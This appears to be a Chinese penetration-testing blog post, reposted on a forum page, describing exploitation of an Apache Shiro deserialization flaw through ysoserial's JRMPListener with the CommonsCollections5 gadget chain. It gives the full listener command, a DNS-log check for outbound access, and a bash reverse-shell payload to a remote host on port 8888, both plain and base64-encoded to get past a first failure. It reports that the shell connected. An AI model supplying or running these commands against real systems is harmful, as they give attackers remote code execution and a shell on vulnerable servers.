前言
最近在测试中遇到一些shiro反序列化不能利用的情况 找到key 无法找到利用链,但是发现存在JRMPClient可用的情况。
换一种工具尝试
发现 JRMPClient 可用, 尝试使用 JRMPClient 进行测试,最终这个目标也没有执行成功所以换了一个目标进行的尝试,仅记录JRMPClient 利用方式。
使用JRMPClient模块进行测试
找到一个同样存在shiro反序列的目标。
同样find: JRMPClient can be use。
搭建JRMPClient 监听服务
首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服务,下载地址:https://github.com/frohoff/ysoserial
使用DNSLOG进行检测
在不确定目标是否通外网的情况下 先使用DNSLOG进行检测 获取一个新的域名 :w3dh1h.dnslog.cn
VPS上开启JRMPListener
在VPS上搭建服务命令
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"
shiro反序列利用工具中选择JRMPClient,然后输入VPS上搭建服务的地址:
JRMPListener 收到返回信息
DNSLOG上收到目标的ping 命令信息 说明目标服务器通外网
执行反弹命令
执行反弹命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1
没有收到反弹链接
将命令进行base64编码 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"
成功收到反弹链接
审核编辑:汤梓红
-
模块
+关注
关注
7文章
2740浏览量
47830 -
key
+关注
关注
0文章
51浏览量
12869
原文标题:使用JRMPClient模块进行测试
文章出处:【微信号:Tide安全团队,微信公众号:Tide安全团队】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
怎样对电源模块进行可靠性测试
![怎样对电源<b class='flag-5'>模块</b><b class='flag-5'>进行</b>可靠性<b class='flag-5'>测试</b>](https://file1.elecfans.com//web2/M00/A6/D1/wKgZomUMQKSAVJLYAABKAo_8qUE595.jpg)
电源模块生产测试必备系统
![电源<b class='flag-5'>模块</b>生产<b class='flag-5'>测试</b>必备系统](https://file.elecfans.com/web1/M00/7E/41/o4YBAFwYjMuAKZldAABY6pCxkf0052.png)
对光模块进行测试的四大步骤
电源模块耐压测试的标准及其规范是什么?要如何测试?
利用ADPD188BI光学烟雾和气雾剂检测模块进行烟雾测试说明
![利用ADPD188BI光学烟雾和气雾剂检测<b class='flag-5'>模块</b><b class='flag-5'>进行</b>烟雾<b class='flag-5'>测试</b>说明](https://file.elecfans.com/web1/M00/D9/4E/pIYBAF_1ac2Ac0EEAABDkS1IP1s689.png)
利用ADPD188BI光学烟雾和气雾剂检测模块来进行烟雾测试
![利用ADPD188BI光学烟雾和气雾剂检测<b class='flag-5'>模块</b>来<b class='flag-5'>进行</b>烟雾<b class='flag-5'>测试</b>](https://file.elecfans.com/web1/M00/D9/4E/pIYBAF_1ac2Ac0EEAABDkS1IP1s689.png)
如何测试光模块的性能?需要哪些测试测量设备?
![如何<b class='flag-5'>测试</b>光<b class='flag-5'>模块</b>的性能?需要哪些<b class='flag-5'>测试</b>测量设备?](https://file1.elecfans.com//web2/M00/BE/DE/wKgZomW4StGAdbYgAAF_xqH7PgU559.png)
评论